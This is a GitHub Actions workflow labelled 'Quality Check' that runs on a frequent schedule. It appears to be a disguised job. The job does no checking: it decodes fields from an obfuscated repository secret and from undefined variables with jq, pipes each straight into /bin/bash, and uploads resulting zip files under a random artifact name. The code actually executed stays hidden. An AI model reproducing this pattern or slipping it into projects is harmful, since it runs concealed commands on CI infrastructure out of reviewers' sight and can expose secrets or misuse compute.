name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '14 5,11,17,23 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  process:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Start
        env:
          snxye55315: ${{ secrets.snxye55315 }}
        run: |
          printf '%s' "$snxye55315" | jq -r .c30 | /bin/bash
          echo $k412 | jq -r .c1409 | /bin/bash
          printf '%s' "$er39305" | jq -r .qt01716 | /bin/bash
          echo $q27 | jq -r .zmygn6585 | /bin/bash
          echo $fneo350 | jq -r .r9169 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: ATjOTLnO
          path: "*.zip"
          retention-days: 1
